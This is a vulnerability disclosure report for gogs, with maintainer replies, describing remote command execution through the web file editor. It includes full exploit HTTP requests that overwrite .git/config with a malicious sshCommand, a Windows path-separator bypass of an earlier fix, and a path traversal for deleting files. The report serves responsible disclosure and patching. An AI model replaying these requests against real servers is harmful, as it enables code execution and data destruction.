OS Command Injection in file editor in gogs/gogs
Jun 1st 2022
Deploy and run gogs.
Proof of Concept
- Create a repository and upload a file named
configto the repository
repo6. The content of the file is as follows:
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = notepad [remote "origin"] url = email@example.com:torvalds/linux.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master
2.The attacker can remove the
POST /admin1/repo6/_delete/master/.git/config Host: 192.168.1.59:3000 Content-Length: 130 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53 Connection: close _csrf=PuAr2ZVY2NpoEOR1se-J81LVboM6MTY1NDAwODAzNDgzNDEwOTAwMA&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
- The attacker can set tree_path
tree_path=.git/configto move a file into the
POST /admin1/repo6/_edit/master/aaa/config Host: 192.168.1.59:3000 Content-Length: 722 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53 Connection: close _csrf=CQ7KgJoDP2oI1xKrj0bx1GtYiQ46MTY1NDAwNzk1MjA5ODk5MTQwMA&last_commit=11e2a5c721b9f9cbe4bb32bcdcc6318794e350ff&tree_path=.git%2Fconfig&content=%5Bcore%5D%0D%0A++++repositoryformatversion+%3D+0%0D%0A++++filemode+%3D+true%0D%0A++++bare+%3D+false%0D%0A++++logallrefupdates+%3D+true%0D%0A++++ignorecase+%3D+true%0D%0A++++precomposeunicode+%3D+true%0D%0A++++sshCommand+%3D+notepad%0D%0A%5Bremote+%22origin%22%5D%0D%0A++++url+%3D+git%40github.com%3Atorvalds%2Flinux.git%0D%0A++++fetch+%3D+%2Brefs%2Fheads%2F*%3Arefs%2Fremotes%2Forigin%2F*%0D%0A%5Bbranch+%22master%22%5D%0D%0A++++remote+%3D+origin%0D%0A++++merge+%3D+refs%2Fheads%2Fmaster%0D%0A%0D%0A%0D%0A&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=
Note: Write or rewrite the
.git/config file ( the
core.sshCommand was already set), which leads to remote command execution vulnerability.
Then the command
notepad executed on the server.
1.This vulnerability is capable of
executing commands on the remote server and gain the privileged user account, which leads sensitive data exposure, identity theft, etc.
2.Delete arbitrary files, such as
3.Write the file to another path.
The video is here. https://streamable.com/2g0gn6 For privacy reasons, it will be deleted in about a week.
Thanks for the report!
Could you specific which commit you're testing against?
I think the second part "The attacker can set tree_path tree_path=.git/config to move a file into the .git/config directory." has already been reported and fixed in https://github.com/gogs/gogs/commit/90bc75229726a24a28507d3e8178f86734f112e1
The test was done on the commit you just mentioned. (=0.12.8)
This is the newly discovered bypass. This RCE is currently only reproduced in Windows.
os.PathSeparator only in
isRepositoryGitPath actually lacks consideration.
As we known, the
os.PathSeparator is equivalent to
\ in Windows.
However, the test found that either
\ can write files to directories in gogs.
\ should be considered.
Another vulnerability is path traversal, which may be independent of the system and can delete arbitrary files.
.. should be considered. Such as here https://github.com/gogs/gogs/blob/509a392272a2ba2bde9d64bf5a55a58d0eadccc4/internal/tool/path.go#L21
Got it, will try to reproduce.
Regarding "delete arbitrary files", do you want to create another report?